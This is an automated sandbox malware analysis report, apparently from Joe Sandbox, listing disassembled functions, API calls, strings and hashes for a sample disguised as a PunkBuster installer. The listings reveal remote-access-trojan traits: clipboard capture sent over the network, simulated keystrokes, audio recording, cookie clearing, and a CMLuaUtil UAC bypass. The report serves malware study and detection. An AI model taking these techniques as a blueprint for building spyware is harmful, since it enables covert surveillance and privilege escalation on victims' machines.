                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: 8000000280000006H_prolog
                                              • String ID: Message$SysAllocString failed: 0x%08lx$get_AuthorizedApplications failed: 0x%08lx$get_Enabled failed: 0x%08lx
                                              • API String ID: 214935-104412183
                                              • Opcode ID: 691445288035ba92857fa2f194e939a569db9ae7efce4dbcbc8219a4a60ad1d2
                                              • Instruction ID: 08d0d689e4b1c90c8307d53243ab566afb64f0a8895c35ba328b35e1111ee248
                                              • Opcode Fuzzy Hash: 691445288035ba92857fa2f194e939a569db9ae7efce4dbcbc8219a4a60ad1d2
                                              • Instruction Fuzzy Hash: 4651CF7090014AAFCB00EF95CC85EAEBBB8AF08314F60466DF516B72D1D7789E44CB65
                                              Function 000D6E27 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 107filesynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00125554), ref: 000D6F24
                                              • CloseHandle.KERNEL32(00000000), ref: 000D6F2D
                                              • DeleteFileA.KERNEL32(00000000), ref: 000D6F3C
                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 000D6EF0
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                              • String ID: <$@$Temp
                                              • API String ID: 1107811701-1032778388
                                              • Opcode ID: a7af5f12961cb0846b8b0bc4fbffc0f97afbc410a3e8e812d740fcf66dda498f
                                              • Instruction ID: e58adba916d65d882e75df37f9e53c6e5cdb18bbaa06cc3d9b29d55418f61777
                                              • Opcode Fuzzy Hash: a7af5f12961cb0846b8b0bc4fbffc0f97afbc410a3e8e812d740fcf66dda498f
                                              • Instruction Fuzzy Hash: DA316A319002199BDB18FBA4DD52FEE7776AF52300F40416CF506A62E3EF701A8ACB90
                                              Function 000C6BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00125454,?,?,00000000,000C7273,00000000,?,0000000A,00000000), ref: 000C6C38
                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,000C7273,00000000,?,0000000A,00000000), ref: 000C6C80
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,000C7273,00000000,?,0000000A,00000000,00000000), ref: 000C6CC0
                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 000C6CDD
                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 000C6D08
                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 000C6D18
                                                • Part of subcall function 000C455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,000C460E,00000000,?,?), ref: 000C456A
                                                • Part of subcall function 000C455B: SetEvent.KERNEL32(?,?,?,000C460E,00000000,?,?), ref: 000C4588
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                              • String ID: .part
                                              • API String ID: 1303771098-3499674018
                                              • Opcode ID: 64ae2d1a369974c8f7283b0b18b43fe4bccc2c3b1d81d1a718a6e2df665de11d
                                              • Instruction ID: 2910a78d9b1eb9f2f7eab13eef5c9c9553ded4efee61f21f503c598bc71d6c12
                                              • Opcode Fuzzy Hash: 64ae2d1a369974c8f7283b0b18b43fe4bccc2c3b1d81d1a718a6e2df665de11d
                                              • Instruction Fuzzy Hash: AF31A071908301AFC324EF20DD85EEFB7E8FB85711F00491DF9C192292DB71AA488B92
                                              Function 00109950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000FD564,000FD564,?,?,?,00109BA1,00000001,00000001,1AE85006), ref: 001099AA
                                              • __alloca_probe_16.LIBCMT ref: 001099E2
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00109BA1,00000001,00000001,1AE85006,?,?,?), ref: 00109A30
                                              • __alloca_probe_16.LIBCMT ref: 00109AC7
                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00109B2A
                                              • __freea.LIBCMT ref: 00109B37
                                                • Part of subcall function 00106AFF: RtlAllocateHeap.NTDLL(00000000,000F4403,?,?,000F7227,?,?,?,?,?,000CCC87,000F4403,?,?,?,?), ref: 00106B31
                                              • __freea.LIBCMT ref: 00109B40
                                              • __freea.LIBCMT ref: 00109B65
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                              • String ID:
                                              • API String ID: 3864826663-0
                                              • Opcode ID: 7d7d242d0bd29555b5b57feb87868826dde12d10d9f9e84d4ba5393f1bb1cd81
                                              • Instruction ID: fb73250609fb7c34ad8864121a803a8673d07a3ef84b48beb1c10ec48399f885
                                              • Opcode Fuzzy Hash: 7d7d242d0bd29555b5b57feb87868826dde12d10d9f9e84d4ba5393f1bb1cd81
                                              • Instruction Fuzzy Hash: C4510472A10206AFDB298F64DCA1EBB77A9EB44760F158628FC44D71C2DBB4DC40C660
                                              Function 000D8ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendInput.USER32 ref: 000D8B08
                                              • SendInput.USER32(00000001,?,0000001C), ref: 000D8B30
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 000D8B57
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 000D8B75
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 000D8B95
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 000D8BBA
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 000D8BDC
                                              • SendInput.USER32(00000001,?,0000001C), ref: 000D8BFF
                                                • Part of subcall function 000D8AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 000D8AB7
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InputSend$Virtual
                                              • String ID:
                                              • API String ID: 1167301434-0
                                              • Opcode ID: 086bd1f51a30275f4d031fc06a3259297534a9c9b83de2749828b519e23a1954
                                              • Instruction ID: db2fcf2971bb5de0c0ad0e45b636e8e3057ab9c35b20bdd9671551b3d771bbc4
                                              • Opcode Fuzzy Hash: 086bd1f51a30275f4d031fc06a3259297534a9c9b83de2749828b519e23a1954
                                              • Instruction Fuzzy Hash: 3D31AF71248349A9E210DF69D841F9FFBECAF89B50F04080FB98497291DAA0D94C87B7
                                              Function 000D5A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenClipboard.USER32 ref: 000D5A46
                                              • EmptyClipboard.USER32 ref: 000D5A54
                                              • CloseClipboard.USER32 ref: 000D5A5A
                                              • OpenClipboard.USER32 ref: 000D5A61
                                              • GetClipboardData.USER32(0000000D), ref: 000D5A71
                                              • GlobalLock.KERNEL32(00000000), ref: 000D5A7A
                                              • GlobalUnlock.KERNEL32(00000000), ref: 000D5A83
                                              • CloseClipboard.USER32 ref: 000D5A89
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                              • String ID:
                                              • API String ID: 2172192267-0
                                              • Opcode ID: 59192f27d8259b8bc6892a890a71e090c4d3799982c4e7f0c30143ff3b6776e1
                                              • Instruction ID: 0e2c1c5005fa503350bdaefdc68aa22b7fc3c48b5635ac34c2c644e6846a2f6f
                                              • Opcode Fuzzy Hash: 59192f27d8259b8bc6892a890a71e090c4d3799982c4e7f0c30143ff3b6776e1
                                              • Instruction Fuzzy Hash: 32015E322183109FC318BB74EE5ABEE77B5BF81711F44852EFC16C26A2DF3088859661
                                              Function 00107E3A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00107EBC
                                              • _free.LIBCMT ref: 00107EE0
                                              • _free.LIBCMT ref: 00108067
                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0011D478), ref: 00108079
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0013179C,000000FF,00000000,0000003F,00000000,?,?), ref: 001080F1
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,001317F0,000000FF,?,0000003F,00000000,?), ref: 0010811E
                                              • _free.LIBCMT ref: 00108233
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                              • String ID:
                                              • API String ID: 314583886-0
                                              • Opcode ID: e6bb0309952ec8d57a55fdac2c6e4b8e22a121c6bdaec8007f7a01932b3f9659
                                              • Instruction ID: a37964bbec4269b5f01632aab3c18a49398c4785b4f1a621c16bbcf9dd48bce3
                                              • Opcode Fuzzy Hash: e6bb0309952ec8d57a55fdac2c6e4b8e22a121c6bdaec8007f7a01932b3f9659
                                              • Instruction Fuzzy Hash: 5EC12971E08205AFCB24DF74CC41AAE7BB9EF55350F18419AE4D5972D1EBB0AE42CB50
                                              Function 00438010 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 214COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateWindowExA.USER32(00000000,BUTTON,?,?,00000000,00000000,00000000,00000000,?,FFFFFF37,00000000,00000000), ref: 00438163
                                              • GetWindowLongA.USER32(00000000,000000FC), ref: 0043818B
                                              • SetWindowLongA.USER32(00000000,000000FC,00437AD0), ref: 0043819E
                                              • SetWindowLongA.USER32(00000000,000000EB), ref: 004381A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Window$Long$Create
                                              • String ID: BUTTON
                                              • API String ID: 1733017098-3405671355
                                              • Opcode ID: 6c3bf0fd82592f3ce33d0156255dc22ed68ef4fecfa262555431378655de1657
                                              • Instruction ID: 5eb1fe1e349d0c2bf26a2ea382cf1488185d3080d212b75d548425cf7d1e2c38
                                              • Opcode Fuzzy Hash: 6c3bf0fd82592f3ce33d0156255dc22ed68ef4fecfa262555431378655de1657
                                              • Instruction Fuzzy Hash: BD718CB1244301AFD314DF69DC81FABB7E9BB88710F10461EF55997391DB78A801CB69
                                              Function 0010F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: aa51c975f4dc6ab1173de034fcd46a94bd4b32de5cdca1c2ab4982a41e2d71f5
                                              • Instruction ID: 0326e167289fa38308331b2c301906776f557a9156b791c7164d4171f58189f0
                                              • Opcode Fuzzy Hash: aa51c975f4dc6ab1173de034fcd46a94bd4b32de5cdca1c2ab4982a41e2d71f5
                                              • Instruction Fuzzy Hash: 38618171D04205EFDB20DF68C842B9ABBF5AB54724F24417AF984EB6D1D7B09D828B90
                                              Function 00409D8D Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 171COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00409D9D
                                                • Part of subcall function 004092B5: __EH_prolog.LIBCMT ref: 004092BA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Battlefield Bad Company 2$Installing$PunkBuster Service Setup v%d.%d %s - Step 2 of 2 - %s$PunkBuster Service Setup v%d.%d %s - Step 3 of 3 - %s$Un-installing
                                              • API String ID: 3519838083-4248269577
                                              • Opcode ID: 47b21bcafda829a2fb58cab40aa02b5fde0f793797ae0bb3dd78f86cf4abb4ca
                                              • Instruction ID: 78eb83f452c0a5ae38286d43f464178ba804fbe3ee9df3c1ff42f644fb56a5a3
                                              • Opcode Fuzzy Hash: 47b21bcafda829a2fb58cab40aa02b5fde0f793797ae0bb3dd78f86cf4abb4ca
                                              • Instruction Fuzzy Hash: A0719F70A002499FDB20DF64C894BEAB7F5AF49304F4440BEE149A72E3DB791E84CB59
                                              Function 0010A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0010A838,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0010A105
                                              • __fassign.LIBCMT ref: 0010A180
                                              • __fassign.LIBCMT ref: 0010A19B
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0010A1C1
                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,0010A838,00000000,?,?,?,?,?,?,?,?,?,0010A838,?), ref: 0010A1E0
                                              • WriteFile.KERNEL32(?,?,00000001,0010A838,00000000,?,?,?,?,?,?,?,?,?,0010A838,?), ref: 0010A219
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID:
                                              • API String ID: 1324828854-0
                                              • Opcode ID: f1f1dd3dbb8fbb29355e50d949577c3632703f8540b48c20994213093b1ee9ba
                                              • Instruction ID: 748054e894f5f14bdcef2e339211405e7b52f19171a5dcf9cc8ca985db053717
                                              • Opcode Fuzzy Hash: f1f1dd3dbb8fbb29355e50d949577c3632703f8540b48c20994213093b1ee9ba
                                              • Instruction Fuzzy Hash: BE51B3B1E04309AFCB14CFA8D885AEEBBF8FF09300F14416AE995E7291D7719941CB61
                                              Function 000F7A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                              Download Yara Rule
                                              APIs
                                              • _ValidateLocalCookies.LIBCMT ref: 000F7AAB
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 000F7AB3
                                              • _ValidateLocalCookies.LIBCMT ref: 000F7B41
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 000F7B6C
                                              • _ValidateLocalCookies.LIBCMT ref: 000F7BC1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                              • String ID: csm
                                              • API String ID: 1170836740-1018135373
                                              • Opcode ID: b2f19f35ccbb66dd921529dc43e3585bd193d18ef9ee56411241be1c87e7fde9
                                              • Instruction ID: 4d97760d50f4a7f320c773b7d16285c03bd4a76c1ebadbdc05693b42ef2d6993
                                              • Opcode Fuzzy Hash: b2f19f35ccbb66dd921529dc43e3585bd193d18ef9ee56411241be1c87e7fde9
                                              • Instruction Fuzzy Hash: C341D230A0420D9BCF10DF68C884BFEBBF5AF46324F1481A5EA195B792D7319A51DB92
                                              Function 000C1A8E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                              Download Yara Rule
                                              APIs
                                              • _strftime.LIBCMT ref: 000C1AD3
                                                • Part of subcall function 000C1BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 000C1C54
                                              • waveInUnprepareHeader.WINMM(00131AC0,00000020,00000000,?), ref: 000C1B85
                                              • waveInPrepareHeader.WINMM(00131AC0,00000020), ref: 000C1BC3
                                              • waveInAddBuffer.WINMM(00131AC0,00000020), ref: 000C1BD2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                              • String ID: %Y-%m-%d %H.%M$.wav
                                              • API String ID: 3809562944-3597965672
                                              • Opcode ID: 7de01bacd1d6c90be307fd0c5414fc1de18d70dcfad407404a5acd1289ae87c5
                                              • Instruction ID: 2854220c635cf96cc333f978a5e333ead184ee268cd2f874c4e9953c23d5fc2e
                                              • Opcode Fuzzy Hash: 7de01bacd1d6c90be307fd0c5414fc1de18d70dcfad407404a5acd1289ae87c5
                                              • Instruction Fuzzy Hash: 69316931505240ABC314EB20EC52FEE7BE4AB95311F40882DF556C39E3EF70AA59CB52
                                              Function 000CB6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000D2513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 000D2537
                                                • Part of subcall function 000D2513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 000D2554
                                                • Part of subcall function 000D2513: RegCloseKey.KERNEL32(?), ref: 000D255F
                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 000CB76C
                                              • PathFileExistsA.SHLWAPI(?), ref: 000CB779
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                              • API String ID: 1133728706-4073444585
                                              • Opcode ID: 5886607d08b855162aad33007ffb2d543c6d36047581edfb838a4e5367b1b21b
                                              • Instruction ID: 43cc91a9fbbd44cef5e30df886dea89c123276c663ebf4c59f8fc9f975fb5e38
                                              • Opcode Fuzzy Hash: 5886607d08b855162aad33007ffb2d543c6d36047581edfb838a4e5367b1b21b
                                              • Instruction Fuzzy Hash: 94217F31A40228A6CB14F7F0DC67EFE7768AF96310F40015DF902A72C3EF605A5AD695
                                              Function 00115903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4124b112eb088853a8c8169e6b3af0c2ce31098a909472dc43c3370ac08d4f6e
                                              • Instruction ID: b9f48a4e70daf3d6537a805c1b3fc82172938bc63d134a796c919c0efa0fe986
                                              • Opcode Fuzzy Hash: 4124b112eb088853a8c8169e6b3af0c2ce31098a909472dc43c3370ac08d4f6e
                                              • Instruction Fuzzy Hash: 30110A7160855DFFCB282F758C44EAB3ABEEFD23747114125F855C72C0DBB4884196A1
                                              Function 00401896 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040189B
                                              • GetLastError.KERNEL32(00000000,?,00000000,00000000), ref: 004018D6
                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 004018E3
                                              • LocalFree.KERNEL32(?), ref: 00401974
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: ErrorFormatFreeH_prologLastLocalMessage
                                              • String ID: **ERROR: %s: %s$Message
                                              • API String ID: 759219404-2348020675
                                              • Opcode ID: 22a5b4929c1e5629f02158e92ff0c09a888a439f7db0ddde2c840bdb6b1484fb
                                              • Instruction ID: 6bda246ea51a2eb7aaa526fdd861ceddc48ebf66c57801f6c4823909223e4e6e
                                              • Opcode Fuzzy Hash: 22a5b4929c1e5629f02158e92ff0c09a888a439f7db0ddde2c840bdb6b1484fb
                                              • Instruction Fuzzy Hash: B42132B194015CEFDB10EB94CC81EEDB7B8AB04318F5081BAB615621E2D6785B85CF69
                                              Function 0010FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0010FA22: _free.LIBCMT ref: 0010FA4B
                                              • _free.LIBCMT ref: 0010FD29
                                                • Part of subcall function 00106AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?), ref: 00106ADB
                                                • Part of subcall function 00106AC5: GetLastError.KERNEL32(?,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?,?), ref: 00106AED
                                              • _free.LIBCMT ref: 0010FD34
                                              • _free.LIBCMT ref: 0010FD3F
                                              • _free.LIBCMT ref: 0010FD93
                                              • _free.LIBCMT ref: 0010FD9E
                                              • _free.LIBCMT ref: 0010FDA9
                                              • _free.LIBCMT ref: 0010FDB4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                              • Instruction ID: d699a55eaf4566f8723cccd6f64b0d17d509d9ed1e7b1afe24d431d9328b1f34
                                              • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                              • Instruction Fuzzy Hash: AD112931B51718E6E570BBB0CC07FCB77D89B14700F844828B2DE674D6E7A4B5264650
                                              Function 000C6815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\4wECQoBvYC.exe), ref: 000C6835
                                                • Part of subcall function 000C6764: _wcslen.LIBCMT ref: 000C6788
                                                • Part of subcall function 000C6764: CoGetObject.OLE32(?,00000024,001259B0,00000000), ref: 000C67E9
                                              • CoUninitialize.OLE32 ref: 000C688E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InitializeObjectUninitialize_wcslen
                                              • String ID: C:\Users\user\Desktop\4wECQoBvYC.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                              • API String ID: 3851391207-1988668739
